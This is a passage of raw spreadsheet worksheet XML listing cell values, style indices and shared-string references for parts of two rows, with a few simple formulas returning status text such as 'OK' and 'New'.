      </c>
      <c r="BU19" s="114" t="s">
        <v>2762</v>
      </c>
      <c r="BV19" s="503">
        <v>904</v>
      </c>
      <c r="BW19" s="115" t="s">
        <v>2763</v>
      </c>
      <c r="BX19" s="115">
        <v>7</v>
      </c>
      <c r="BY19" s="116">
        <v>878</v>
      </c>
      <c r="BZ19" s="250">
        <v>2287</v>
      </c>
      <c r="CA19" s="251" t="s">
        <v>2764</v>
      </c>
      <c r="CB19" s="505">
        <v>2204</v>
      </c>
      <c r="CC19" s="252" t="s">
        <v>2765</v>
      </c>
      <c r="CD19" s="252">
        <v>13</v>
      </c>
      <c r="CE19" s="253">
        <v>878</v>
      </c>
      <c r="CF19" s="101">
        <v>3246</v>
      </c>
      <c r="CG19" s="102" t="s">
        <v>2766</v>
      </c>
      <c r="CH19" s="102">
        <v>3108</v>
      </c>
      <c r="CI19" s="103" t="s">
        <v>2767</v>
      </c>
      <c r="CJ19" s="103">
        <v>20</v>
      </c>
      <c r="CK19" s="104">
        <v>878</v>
      </c>
      <c r="CL19" s="190">
        <v>0</v>
      </c>
      <c r="CM19" s="191">
        <v>0</v>
      </c>
      <c r="CN19" s="498">
        <v>0</v>
      </c>
      <c r="CO19" s="192">
        <v>0</v>
      </c>
      <c r="CP19" s="192">
        <v>0</v>
      </c>
      <c r="CQ19" s="108">
        <v>0</v>
      </c>
      <c r="CR19" s="109">
        <v>34</v>
      </c>
      <c r="CS19" s="110" t="s">
        <v>1936</v>
      </c>
      <c r="CT19" s="501">
        <v>20</v>
      </c>
      <c r="CU19" s="111" t="s">
        <v>1937</v>
      </c>
      <c r="CV19" s="111">
        <v>1</v>
      </c>
      <c r="CW19" s="112">
        <v>20</v>
      </c>
      <c r="CX19" s="113">
        <v>1416</v>
      </c>
      <c r="CY19" s="114" t="s">
        <v>2137</v>
      </c>
      <c r="CZ19" s="503">
        <v>1347</v>
      </c>
      <c r="DA19" s="115" t="s">
        <v>2138</v>
      </c>
      <c r="DB19" s="115">
        <v>10</v>
      </c>
      <c r="DC19" s="116">
        <v>878</v>
      </c>
      <c r="DD19" s="101">
        <v>0</v>
      </c>
      <c r="DE19" s="102">
        <v>0</v>
      </c>
      <c r="DF19" s="102">
        <v>0</v>
      </c>
      <c r="DG19" s="103">
        <v>0</v>
      </c>
      <c r="DH19" s="103">
        <v>0</v>
      </c>
      <c r="DI19" s="104">
        <v>0</v>
      </c>
      <c r="DJ19" s="190">
        <v>459</v>
      </c>
      <c r="DK19" s="191" t="s">
        <v>2768</v>
      </c>
      <c r="DL19" s="498">
        <v>444</v>
      </c>
      <c r="DM19" s="192" t="s">
        <v>2769</v>
      </c>
      <c r="DN19" s="192">
        <v>4</v>
      </c>
      <c r="DO19" s="108">
        <v>442</v>
      </c>
      <c r="DP19" s="109">
        <v>459</v>
      </c>
      <c r="DQ19" s="110" t="s">
        <v>2768</v>
      </c>
      <c r="DR19" s="501">
        <v>444</v>
      </c>
      <c r="DS19" s="111" t="s">
        <v>2769</v>
      </c>
      <c r="DT19" s="111">
        <v>4</v>
      </c>
      <c r="DU19" s="112">
        <v>442</v>
      </c>
      <c r="DV19" s="113">
        <v>946</v>
      </c>
      <c r="DW19" s="114" t="s">
        <v>2770</v>
      </c>
      <c r="DX19" s="503">
        <v>899</v>
      </c>
      <c r="DY19" s="115" t="s">
        <v>2771</v>
      </c>
      <c r="DZ19" s="115">
        <v>4</v>
      </c>
      <c r="EA19" s="116">
        <v>878</v>
      </c>
      <c r="EB19" s="250">
        <v>1371</v>
      </c>
      <c r="EC19" s="251" t="s">
        <v>2772</v>
      </c>
      <c r="ED19" s="505">
        <v>1322</v>
      </c>
      <c r="EE19" s="252" t="s">
        <v>2773</v>
      </c>
      <c r="EF19" s="252">
        <v>7</v>
      </c>
      <c r="EG19" s="253">
        <v>878</v>
      </c>
      <c r="EH19" s="101">
        <v>2317</v>
      </c>
      <c r="EI19" s="102" t="s">
        <v>2774</v>
      </c>
      <c r="EJ19" s="102">
        <v>2221</v>
      </c>
      <c r="EK19" s="103" t="s">
        <v>2775</v>
      </c>
      <c r="EL19" s="103">
        <v>11</v>
      </c>
      <c r="EM19" s="104">
        <v>878</v>
      </c>
      <c r="EN19" s="190">
        <v>0</v>
      </c>
      <c r="EO19" s="191">
        <v>0</v>
      </c>
      <c r="EP19" s="498">
        <v>0</v>
      </c>
      <c r="EQ19" s="192">
        <v>0</v>
      </c>
      <c r="ER19" s="192">
        <v>0</v>
      </c>
      <c r="ES19" s="108">
        <v>0</v>
      </c>
      <c r="ET19" s="109">
        <v>34</v>
      </c>
      <c r="EU19" s="110" t="s">
        <v>1936</v>
      </c>
      <c r="EV19" s="501">
        <v>20</v>
      </c>
      <c r="EW19" s="111" t="s">
        <v>1937</v>
      </c>
      <c r="EX19" s="111">
        <v>1</v>
      </c>
      <c r="EY19" s="112">
        <v>20</v>
      </c>
      <c r="EZ19" s="113">
        <v>493</v>
      </c>
      <c r="FA19" s="114" t="s">
        <v>2776</v>
      </c>
      <c r="FB19" s="503">
        <v>464</v>
      </c>
      <c r="FC19" s="115" t="s">
        <v>2777</v>
      </c>
      <c r="FD19" s="115">
        <v>5</v>
      </c>
      <c r="FE19" s="116">
        <v>452</v>
      </c>
      <c r="FF19" s="101">
        <v>5</v>
      </c>
      <c r="FG19" s="102" t="s">
        <v>1815</v>
      </c>
      <c r="FH19" s="102">
        <v>1</v>
      </c>
      <c r="FI19" s="103" t="s">
        <v>336</v>
      </c>
      <c r="FJ19" s="103">
        <v>1</v>
      </c>
      <c r="FK19" s="104">
        <v>1</v>
      </c>
      <c r="FL19" s="190">
        <v>908</v>
      </c>
      <c r="FM19" s="191" t="s">
        <v>2778</v>
      </c>
      <c r="FN19" s="498">
        <v>877</v>
      </c>
      <c r="FO19" s="192" t="s">
        <v>2779</v>
      </c>
      <c r="FP19" s="192">
        <v>1</v>
      </c>
      <c r="FQ19" s="108">
        <v>877</v>
      </c>
      <c r="FR19" s="109">
        <v>913</v>
      </c>
      <c r="FS19" s="110" t="s">
        <v>2780</v>
      </c>
      <c r="FT19" s="501">
        <v>878</v>
      </c>
      <c r="FU19" s="111" t="s">
        <v>2781</v>
      </c>
      <c r="FV19" s="111">
        <v>2</v>
      </c>
      <c r="FW19" s="112">
        <v>878</v>
      </c>
      <c r="FX19" s="113">
        <v>5</v>
      </c>
      <c r="FY19" s="114" t="s">
        <v>1815</v>
      </c>
      <c r="FZ19" s="503">
        <v>1</v>
      </c>
      <c r="GA19" s="115" t="s">
        <v>336</v>
      </c>
      <c r="GB19" s="115">
        <v>1</v>
      </c>
      <c r="GC19" s="116">
        <v>1</v>
      </c>
      <c r="GD19" s="250">
        <v>914</v>
      </c>
      <c r="GE19" s="251" t="s">
        <v>2782</v>
      </c>
      <c r="GF19" s="505">
        <v>881</v>
      </c>
      <c r="GG19" s="252" t="s">
        <v>2783</v>
      </c>
      <c r="GH19" s="252">
        <v>5</v>
      </c>
      <c r="GI19" s="253">
        <v>877</v>
      </c>
      <c r="GJ19" s="101">
        <v>919</v>
      </c>
      <c r="GK19" s="102" t="s">
        <v>2784</v>
      </c>
      <c r="GL19" s="102">
        <v>882</v>
      </c>
      <c r="GM19" s="103" t="s">
        <v>2785</v>
      </c>
      <c r="GN19" s="103">
        <v>6</v>
      </c>
      <c r="GO19" s="104">
        <v>878</v>
      </c>
      <c r="GP19" s="190">
        <v>0</v>
      </c>
      <c r="GQ19" s="191">
        <v>0</v>
      </c>
      <c r="GR19" s="498">
        <v>0</v>
      </c>
      <c r="GS19" s="192">
        <v>0</v>
      </c>
      <c r="GT19" s="192">
        <v>0</v>
      </c>
      <c r="GU19" s="108">
        <v>0</v>
      </c>
      <c r="GV19" s="109">
        <v>0</v>
      </c>
      <c r="GW19" s="110">
        <v>0</v>
      </c>
      <c r="GX19" s="501">
        <v>0</v>
      </c>
      <c r="GY19" s="111">
        <v>0</v>
      </c>
      <c r="GZ19" s="111">
        <v>0</v>
      </c>
      <c r="HA19" s="112">
        <v>0</v>
      </c>
      <c r="HB19" s="113">
        <v>913</v>
      </c>
      <c r="HC19" s="114" t="s">
        <v>2780</v>
      </c>
      <c r="HD19" s="503">
        <v>878</v>
      </c>
      <c r="HE19" s="115" t="s">
        <v>2781</v>
      </c>
      <c r="HF19" s="115">
        <v>2</v>
      </c>
      <c r="HG19" s="116">
        <v>878</v>
      </c>
      <c r="HH19" s="101">
        <v>8</v>
      </c>
      <c r="HI19" s="102" t="s">
        <v>2786</v>
      </c>
      <c r="HJ19" s="102">
        <v>4</v>
      </c>
      <c r="HK19" s="103" t="s">
        <v>1814</v>
      </c>
      <c r="HL19" s="103">
        <v>2</v>
      </c>
      <c r="HM19" s="104">
        <v>3</v>
      </c>
      <c r="HN19" s="190">
        <v>2</v>
      </c>
      <c r="HO19" s="191" t="s">
        <v>2656</v>
      </c>
      <c r="HP19" s="498">
        <v>1</v>
      </c>
      <c r="HQ19" s="192" t="s">
        <v>2657</v>
      </c>
      <c r="HR19" s="192">
        <v>1</v>
      </c>
      <c r="HS19" s="108">
        <v>1</v>
      </c>
      <c r="HT19" s="109">
        <v>10</v>
      </c>
      <c r="HU19" s="110" t="s">
        <v>2787</v>
      </c>
      <c r="HV19" s="501">
        <v>5</v>
      </c>
      <c r="HW19" s="111" t="s">
        <v>2788</v>
      </c>
      <c r="HX19" s="111">
        <v>3</v>
      </c>
      <c r="HY19" s="112">
        <v>3</v>
      </c>
      <c r="HZ19" s="113">
        <v>8</v>
      </c>
      <c r="IA19" s="114" t="s">
        <v>2786</v>
      </c>
      <c r="IB19" s="503">
        <v>4</v>
      </c>
      <c r="IC19" s="115" t="s">
        <v>1814</v>
      </c>
      <c r="ID19" s="115">
        <v>2</v>
      </c>
      <c r="IE19" s="116">
        <v>3</v>
      </c>
      <c r="IF19" s="250">
        <v>2</v>
      </c>
      <c r="IG19" s="251" t="s">
        <v>2656</v>
      </c>
      <c r="IH19" s="505">
        <v>1</v>
      </c>
      <c r="II19" s="252" t="s">
        <v>2657</v>
      </c>
      <c r="IJ19" s="252">
        <v>1</v>
      </c>
      <c r="IK19" s="253">
        <v>1</v>
      </c>
      <c r="IL19" s="101">
        <v>10</v>
      </c>
      <c r="IM19" s="102" t="s">
        <v>2787</v>
      </c>
      <c r="IN19" s="102">
        <v>5</v>
      </c>
      <c r="IO19" s="103" t="s">
        <v>2788</v>
      </c>
      <c r="IP19" s="103">
        <v>3</v>
      </c>
      <c r="IQ19" s="104">
        <v>3</v>
      </c>
      <c r="IR19" s="190">
        <v>0</v>
      </c>
      <c r="IS19" s="191">
        <v>0</v>
      </c>
      <c r="IT19" s="498">
        <v>0</v>
      </c>
      <c r="IU19" s="192">
        <v>0</v>
      </c>
      <c r="IV19" s="192">
        <v>0</v>
      </c>
      <c r="IW19" s="108">
        <v>0</v>
      </c>
      <c r="IX19" s="109">
        <v>0</v>
      </c>
      <c r="IY19" s="110">
        <v>0</v>
      </c>
      <c r="IZ19" s="501">
        <v>0</v>
      </c>
      <c r="JA19" s="111">
        <v>0</v>
      </c>
      <c r="JB19" s="111">
        <v>0</v>
      </c>
      <c r="JC19" s="112">
        <v>0</v>
      </c>
      <c r="JD19" s="113">
        <v>10</v>
      </c>
      <c r="JE19" s="114" t="s">
        <v>2787</v>
      </c>
      <c r="JF19" s="503">
        <v>5</v>
      </c>
      <c r="JG19" s="115" t="s">
        <v>2788</v>
      </c>
      <c r="JH19" s="115">
        <v>3</v>
      </c>
      <c r="JI19" s="116">
        <v>3</v>
      </c>
      <c r="JJ19" s="101">
        <v>0</v>
      </c>
      <c r="JK19" s="102">
        <v>0</v>
      </c>
      <c r="JL19" s="102">
        <v>0</v>
      </c>
      <c r="JM19" s="103">
        <v>0</v>
      </c>
      <c r="JN19" s="103">
        <v>0</v>
      </c>
      <c r="JO19" s="104">
        <v>0</v>
      </c>
      <c r="JP19" s="190">
        <v>0</v>
      </c>
      <c r="JQ19" s="191">
        <v>0</v>
      </c>
      <c r="JR19" s="498">
        <v>0</v>
      </c>
      <c r="JS19" s="192">
        <v>0</v>
      </c>
      <c r="JT19" s="192">
        <v>0</v>
      </c>
      <c r="JU19" s="108">
        <v>0</v>
      </c>
      <c r="JV19" s="109">
        <v>0</v>
      </c>
      <c r="JW19" s="110">
        <v>0</v>
      </c>
      <c r="JX19" s="501">
        <v>0</v>
      </c>
      <c r="JY19" s="111">
        <v>0</v>
      </c>
      <c r="JZ19" s="111">
        <v>0</v>
      </c>
      <c r="KA19" s="112">
        <v>0</v>
      </c>
      <c r="KB19" s="113">
        <v>0</v>
      </c>
      <c r="KC19" s="114">
        <v>0</v>
      </c>
      <c r="KD19" s="503">
        <v>0</v>
      </c>
      <c r="KE19" s="115">
        <v>0</v>
      </c>
      <c r="KF19" s="115">
        <v>0</v>
      </c>
      <c r="KG19" s="116">
        <v>0</v>
      </c>
      <c r="KH19" s="250">
        <v>0</v>
      </c>
      <c r="KI19" s="251">
        <v>0</v>
      </c>
      <c r="KJ19" s="505">
        <v>0</v>
      </c>
      <c r="KK19" s="252">
        <v>0</v>
      </c>
      <c r="KL19" s="252">
        <v>0</v>
      </c>
      <c r="KM19" s="253">
        <v>0</v>
      </c>
      <c r="KN19" s="101">
        <v>0</v>
      </c>
      <c r="KO19" s="102">
        <v>0</v>
      </c>
      <c r="KP19" s="102">
        <v>0</v>
      </c>
      <c r="KQ19" s="103">
        <v>0</v>
      </c>
      <c r="KR19" s="103">
        <v>0</v>
      </c>
      <c r="KS19" s="104">
        <v>0</v>
      </c>
      <c r="KT19" s="190">
        <v>0</v>
      </c>
      <c r="KU19" s="191">
        <v>0</v>
      </c>
      <c r="KV19" s="498">
        <v>0</v>
      </c>
      <c r="KW19" s="192">
        <v>0</v>
      </c>
      <c r="KX19" s="192">
        <v>0</v>
      </c>
      <c r="KY19" s="108">
        <v>0</v>
      </c>
      <c r="KZ19" s="109">
        <v>0</v>
      </c>
      <c r="LA19" s="110">
        <v>0</v>
      </c>
      <c r="LB19" s="501">
        <v>0</v>
      </c>
      <c r="LC19" s="111">
        <v>0</v>
      </c>
      <c r="LD19" s="111">
        <v>0</v>
      </c>
      <c r="LE19" s="112">
        <v>0</v>
      </c>
      <c r="LF19" s="113">
        <v>0</v>
      </c>
      <c r="LG19" s="114">
        <v>0</v>
      </c>
      <c r="LH19" s="503">
        <v>0</v>
      </c>
      <c r="LI19" s="115">
        <v>0</v>
      </c>
      <c r="LJ19" s="115">
        <v>0</v>
      </c>
      <c r="LK19" s="116">
        <v>0</v>
      </c>
      <c r="LL19" s="117">
        <v>1826</v>
      </c>
      <c r="LM19" s="507">
        <v>1823</v>
      </c>
      <c r="LN19" s="119">
        <v>2</v>
      </c>
      <c r="LO19" s="119">
        <v>5</v>
      </c>
      <c r="LP19" s="119">
        <v>913</v>
      </c>
      <c r="LQ19" s="119">
        <v>2</v>
      </c>
      <c r="LR19" s="119">
        <v>912</v>
      </c>
      <c r="LS19" s="119">
        <v>912</v>
      </c>
      <c r="LT19" s="382"/>
      <c r="LU19" s="117">
        <v>1</v>
      </c>
      <c r="LV19" s="118" t="s">
        <v>4160</v>
      </c>
      <c r="LW19" s="507">
        <v>1</v>
      </c>
      <c r="LX19" s="119" t="s">
        <v>2536</v>
      </c>
      <c r="LY19" s="119">
        <v>1</v>
      </c>
      <c r="LZ19" s="119">
        <v>1</v>
      </c>
      <c r="MA19" s="117">
        <v>0</v>
      </c>
      <c r="MB19" s="118">
        <v>0</v>
      </c>
      <c r="MC19" s="507">
        <v>0</v>
      </c>
      <c r="MD19" s="119">
        <v>0</v>
      </c>
      <c r="ME19" s="119">
        <v>0</v>
      </c>
      <c r="MF19" s="119">
        <v>0</v>
      </c>
      <c r="MG19" s="117">
        <v>0</v>
      </c>
      <c r="MH19" s="118">
        <v>0</v>
      </c>
      <c r="MI19" s="507">
        <v>0</v>
      </c>
      <c r="MJ19" s="119">
        <v>0</v>
      </c>
      <c r="MK19" s="119">
        <v>0</v>
      </c>
      <c r="ML19" s="119">
        <v>0</v>
      </c>
      <c r="MM19" s="117">
        <v>0</v>
      </c>
      <c r="MN19" s="118">
        <v>0</v>
      </c>
      <c r="MO19" s="507">
        <v>0</v>
      </c>
      <c r="MP19" s="119">
        <v>0</v>
      </c>
      <c r="MQ19" s="119">
        <v>0</v>
      </c>
      <c r="MR19" s="119">
        <v>0</v>
      </c>
      <c r="MS19" s="117">
        <v>2</v>
      </c>
      <c r="MT19" s="118" t="s">
        <v>4181</v>
      </c>
      <c r="MU19" s="507">
        <v>2</v>
      </c>
      <c r="MV19" s="119" t="s">
        <v>2789</v>
      </c>
      <c r="MW19" s="119">
        <v>1</v>
      </c>
      <c r="MX19" s="119">
        <v>2</v>
      </c>
      <c r="MY19" s="117">
        <v>0</v>
      </c>
      <c r="MZ19" s="118">
        <v>0</v>
      </c>
      <c r="NA19" s="507">
        <v>0</v>
      </c>
      <c r="NB19" s="119">
        <v>0</v>
      </c>
      <c r="NC19" s="119">
        <v>0</v>
      </c>
      <c r="ND19" s="119">
        <v>0</v>
      </c>
      <c r="NE19" s="117">
        <v>0</v>
      </c>
      <c r="NF19" s="118">
        <v>0</v>
      </c>
      <c r="NG19" s="507">
        <v>0</v>
      </c>
      <c r="NH19" s="119">
        <v>0</v>
      </c>
      <c r="NI19" s="119">
        <v>0</v>
      </c>
      <c r="NJ19" s="119">
        <v>0</v>
      </c>
      <c r="NK19" s="117">
        <v>908</v>
      </c>
      <c r="NL19" s="118" t="s">
        <v>4182</v>
      </c>
      <c r="NM19" s="507">
        <v>908</v>
      </c>
      <c r="NN19" s="119" t="s">
        <v>2638</v>
      </c>
      <c r="NO19" s="119">
        <v>1</v>
      </c>
      <c r="NP19" s="119">
        <v>908</v>
      </c>
      <c r="NQ19" s="117">
        <v>0</v>
      </c>
      <c r="NR19" s="118">
        <v>0</v>
      </c>
      <c r="NS19" s="507">
        <v>0</v>
      </c>
      <c r="NT19" s="119">
        <v>0</v>
      </c>
      <c r="NU19" s="119">
        <v>0</v>
      </c>
      <c r="NV19" s="119">
        <v>0</v>
      </c>
      <c r="NW19" s="117">
        <v>915</v>
      </c>
      <c r="NX19" s="118" t="s">
        <v>4332</v>
      </c>
      <c r="NY19" s="507">
        <v>912</v>
      </c>
      <c r="NZ19" s="119" t="s">
        <v>4183</v>
      </c>
      <c r="OA19" s="119">
        <v>4</v>
      </c>
      <c r="OB19" s="119">
        <v>912</v>
      </c>
      <c r="OC19" s="120">
        <v>0</v>
      </c>
      <c r="OD19" s="120">
        <v>0</v>
      </c>
      <c r="OE19" s="120">
        <v>0</v>
      </c>
      <c r="OF19" s="121">
        <v>0</v>
      </c>
      <c r="OG19" s="120">
        <v>0</v>
      </c>
      <c r="OH19" s="120">
        <v>0</v>
      </c>
      <c r="OI19" s="120">
        <v>0</v>
      </c>
      <c r="OJ19" s="120">
        <v>0</v>
      </c>
      <c r="OK19" s="383"/>
      <c r="OL19" s="120">
        <v>0</v>
      </c>
      <c r="OM19" s="120">
        <v>0</v>
      </c>
      <c r="ON19" s="120">
        <v>0</v>
      </c>
      <c r="OO19" s="120"/>
      <c r="OP19" s="120">
        <v>0</v>
      </c>
      <c r="OQ19" s="464">
        <v>0</v>
      </c>
      <c r="OR19" s="120">
        <v>0</v>
      </c>
      <c r="OS19" s="120">
        <v>0</v>
      </c>
      <c r="OT19" s="120">
        <v>0</v>
      </c>
      <c r="OU19" s="120"/>
      <c r="OV19" s="120">
        <v>0</v>
      </c>
      <c r="OW19" s="464">
        <v>0</v>
      </c>
      <c r="OX19" s="120">
        <v>0</v>
      </c>
      <c r="OY19" s="120">
        <v>0</v>
      </c>
      <c r="OZ19" s="120">
        <v>0</v>
      </c>
      <c r="PA19" s="120"/>
      <c r="PB19" s="120">
        <v>0</v>
      </c>
      <c r="PC19" s="464">
        <v>0</v>
      </c>
      <c r="PD19" s="120">
        <v>0</v>
      </c>
      <c r="PE19" s="120">
        <v>0</v>
      </c>
      <c r="PF19" s="120">
        <v>0</v>
      </c>
      <c r="PG19" s="120"/>
      <c r="PH19" s="120">
        <v>0</v>
      </c>
      <c r="PI19" s="464">
        <v>0</v>
      </c>
      <c r="PJ19" s="120">
        <v>0</v>
      </c>
      <c r="PK19" s="120">
        <v>0</v>
      </c>
      <c r="PL19" s="120">
        <v>0</v>
      </c>
      <c r="PM19" s="120"/>
      <c r="PN19" s="120">
        <v>0</v>
      </c>
      <c r="PO19" s="464">
        <v>0</v>
      </c>
      <c r="PP19" s="120">
        <v>0</v>
      </c>
      <c r="PQ19" s="120">
        <v>0</v>
      </c>
      <c r="PR19" s="120">
        <v>0</v>
      </c>
      <c r="PS19" s="120"/>
      <c r="PT19" s="120">
        <v>0</v>
      </c>
      <c r="PU19" s="464">
        <v>0</v>
      </c>
      <c r="PV19" s="120">
        <v>0</v>
      </c>
      <c r="PW19" s="120">
        <v>0</v>
      </c>
      <c r="PX19" s="120">
        <v>0</v>
      </c>
      <c r="PY19" s="120"/>
      <c r="PZ19" s="120">
        <v>0</v>
      </c>
      <c r="QA19" s="464">
        <v>0</v>
      </c>
      <c r="QB19" s="120">
        <v>0</v>
      </c>
      <c r="QC19" s="120">
        <v>0</v>
      </c>
      <c r="QD19" s="120">
        <v>0</v>
      </c>
      <c r="QE19" s="120"/>
      <c r="QF19" s="120">
        <v>0</v>
      </c>
      <c r="QG19" s="464">
        <v>0</v>
      </c>
      <c r="QH19" s="120">
        <v>0</v>
      </c>
      <c r="QI19" s="120">
        <v>0</v>
      </c>
      <c r="QJ19" s="120">
        <v>0</v>
      </c>
      <c r="QK19" s="120"/>
      <c r="QL19" s="120">
        <v>0</v>
      </c>
      <c r="QM19" s="464">
        <v>0</v>
      </c>
      <c r="QN19" s="120">
        <v>0</v>
      </c>
      <c r="QO19" s="120">
        <v>0</v>
      </c>
      <c r="QP19" s="120">
        <v>0</v>
      </c>
      <c r="QQ19" s="120"/>
      <c r="QR19" s="120">
        <v>0</v>
      </c>
      <c r="QS19" s="464">
        <v>0</v>
      </c>
      <c r="QT19" s="184"/>
      <c r="QU19" s="184"/>
      <c r="QV19" s="184"/>
      <c r="QW19" s="184"/>
      <c r="QX19" s="184"/>
      <c r="QY19" s="184"/>
      <c r="QZ19" s="184"/>
      <c r="RA19" s="184"/>
      <c r="RB19" s="184"/>
      <c r="RC19" s="184"/>
      <c r="RD19" s="184"/>
      <c r="RE19" s="184"/>
      <c r="RF19" s="184"/>
      <c r="RG19" s="184"/>
      <c r="RH19" s="184"/>
      <c r="RI19" s="184"/>
      <c r="RJ19" s="184"/>
      <c r="RK19" s="184"/>
      <c r="RL19" s="184"/>
      <c r="RM19" s="184"/>
      <c r="RN19" s="184"/>
      <c r="RO19" s="184"/>
      <c r="RP19" s="184"/>
      <c r="RQ19" s="184"/>
      <c r="RR19" s="184"/>
      <c r="RS19" s="184"/>
      <c r="RT19" s="184"/>
      <c r="RU19" s="184"/>
      <c r="RV19" s="184"/>
      <c r="RW19" s="184"/>
      <c r="RX19" s="184"/>
      <c r="RY19" s="184"/>
      <c r="RZ19" s="184"/>
      <c r="SA19" s="184"/>
      <c r="SB19" s="184"/>
      <c r="SC19" s="184"/>
      <c r="SD19" s="184"/>
      <c r="SE19" s="184"/>
      <c r="SF19" s="184"/>
      <c r="SG19" s="184"/>
      <c r="SH19" s="184"/>
      <c r="SI19" s="184"/>
      <c r="SJ19" s="184"/>
      <c r="SK19" s="184"/>
      <c r="SL19" s="184"/>
      <c r="SM19" s="184"/>
      <c r="SN19" s="184"/>
      <c r="SO19" s="184"/>
      <c r="SP19" s="184"/>
      <c r="SQ19" s="184"/>
      <c r="SR19" s="184"/>
      <c r="SS19" s="184"/>
      <c r="ST19" s="184"/>
      <c r="SU19" s="184"/>
      <c r="SV19" s="184"/>
      <c r="SW19" s="184"/>
      <c r="SX19" s="184"/>
      <c r="SY19" s="184"/>
      <c r="SZ19" s="184"/>
      <c r="TA19" s="184"/>
      <c r="TB19" s="184"/>
      <c r="TC19" s="184"/>
      <c r="TD19" s="184"/>
      <c r="TE19" s="184"/>
      <c r="TF19" s="184"/>
      <c r="TG19" s="184"/>
      <c r="TH19" s="184"/>
      <c r="TI19" s="184"/>
      <c r="TJ19" s="184"/>
      <c r="TK19" s="184"/>
      <c r="TL19" s="184"/>
      <c r="TM19" s="184"/>
      <c r="TN19" s="184"/>
      <c r="TO19" s="184"/>
      <c r="TP19" s="184"/>
      <c r="TQ19" s="184"/>
      <c r="TR19" s="184"/>
      <c r="TS19" s="184"/>
      <c r="TT19" s="184"/>
      <c r="TU19" s="184"/>
      <c r="TV19" s="184"/>
      <c r="TW19" s="184"/>
      <c r="TX19" s="184"/>
      <c r="TY19" s="184"/>
      <c r="TZ19" s="184"/>
      <c r="UA19" s="184"/>
      <c r="UB19" s="184"/>
      <c r="UC19" s="184"/>
      <c r="UD19" s="184"/>
      <c r="UE19" s="184"/>
      <c r="UF19" s="184"/>
      <c r="UG19" s="184"/>
      <c r="UH19" s="184"/>
      <c r="UI19" s="184"/>
      <c r="UJ19" s="184"/>
      <c r="UK19" s="184"/>
      <c r="UL19" s="184"/>
      <c r="UM19" s="184"/>
      <c r="UN19" s="184"/>
      <c r="UO19" s="184"/>
      <c r="UP19" s="184"/>
      <c r="UQ19" s="184"/>
      <c r="UR19" s="184"/>
      <c r="US19" s="184"/>
      <c r="UT19" s="184"/>
      <c r="UU19" s="184"/>
      <c r="UV19" s="184"/>
      <c r="UW19" s="184"/>
      <c r="UX19" s="184"/>
      <c r="UY19" s="184"/>
      <c r="UZ19" s="184"/>
      <c r="VA19" s="184"/>
      <c r="VB19" s="184"/>
      <c r="VC19" s="184"/>
      <c r="VD19" s="184"/>
      <c r="VE19" s="184"/>
      <c r="VF19" s="184"/>
      <c r="VG19" s="184"/>
      <c r="VH19" s="184"/>
      <c r="VI19" s="184"/>
      <c r="VJ19" s="184"/>
      <c r="VK19" s="184"/>
      <c r="VL19" s="184"/>
      <c r="VM19" s="184"/>
      <c r="VN19" s="184"/>
      <c r="VO19" s="184"/>
      <c r="VP19" s="184"/>
      <c r="VQ19" s="184"/>
      <c r="VR19" s="184"/>
      <c r="VS19" s="184"/>
      <c r="VT19" s="184"/>
      <c r="VU19" s="184"/>
      <c r="VV19" s="184"/>
      <c r="VW19" s="184"/>
      <c r="VX19" s="184"/>
      <c r="VY19" s="184"/>
    </row>
    <row r="20" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A20" s="82" t="s">
        <v>14</v>
      </c>
      <c r="B20" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C20" s="83" t="s">
        <v>318</v>
      </c>
      <c r="D20" s="83" t="s">
        <v>42</v>
      </c>
      <c r="E20" s="83">
        <f t="shared" si="2"/>
        <v>15</v>
      </c>
      <c r="F20" s="83" t="s">
        <v>43</v>
      </c>
      <c r="G20" s="94" t="s">
        <v>911</v>
      </c>
      <c r="H20" s="83" t="s">
        <v>912</v>
      </c>
      <c r="I20" s="81" t="s">
        <v>913</v>
      </c>
      <c r="J20" s="85" t="s">
        <v>795</v>
      </c>
      <c r="K20" s="81" t="s">
        <v>871</v>
      </c>
      <c r="L20" s="81" t="s">
        <v>914</v>
      </c>
      <c r="M20" s="378" t="s">
        <v>194</v>
      </c>
      <c r="N20" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O20" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P20" s="91"/>
      <c r="Q20" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R20" s="92" t="s">
        <v>915</v>
      </c>
      <c r="S20" s="93" t="s">
        <v>843</v>
      </c>
      <c r="T20" s="92" t="s">
        <v>916</v>
      </c>
      <c r="U20" s="94" t="s">
        <v>917</v>
      </c>
      <c r="V20" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W20" s="96" t="s">
        <v>918</v>
      </c>
      <c r="X20" s="97" t="s">
        <v>919</v>
      </c>
      <c r="Y20" s="83" t="s">
        <v>920</v>
      </c>
      <c r="Z20" s="98" t="s">
        <v>921</v>
      </c>
      <c r="AA20" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB20" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC20" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD20" s="83"/>
      <c r="AE20" s="83"/>
      <c r="AF20" s="384" t="s">
        <v>745</v>
      </c>
      <c r="AG20" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH20" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI20" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ20" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK20" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL20" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM20" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN20" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO20" s="356" t="s">
        <v>747</v>
      </c>
      <c r="AP20" s="357" t="s">
        <v>745</v>
      </c>
      <c r="AQ20" s="646">
        <v>10</v>
      </c>
      <c r="AR20" s="100"/>
      <c r="AS20" s="100">
        <v>1</v>
      </c>
      <c r="AT20" s="100">
        <v>0</v>
      </c>
      <c r="AU20" s="100">
        <v>1</v>
      </c>
      <c r="AV20" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW20" s="100">
        <v>1</v>
      </c>
      <c r="AX20" s="100">
        <v>1</v>
      </c>
      <c r="AY20" s="100">
        <v>0</v>
      </c>
      <c r="AZ20" s="100">
        <v>1</v>
      </c>
      <c r="BA20" s="381" t="s">
        <v>4874</v>
      </c>
      <c r="BB20" s="101">
        <v>2</v>
      </c>
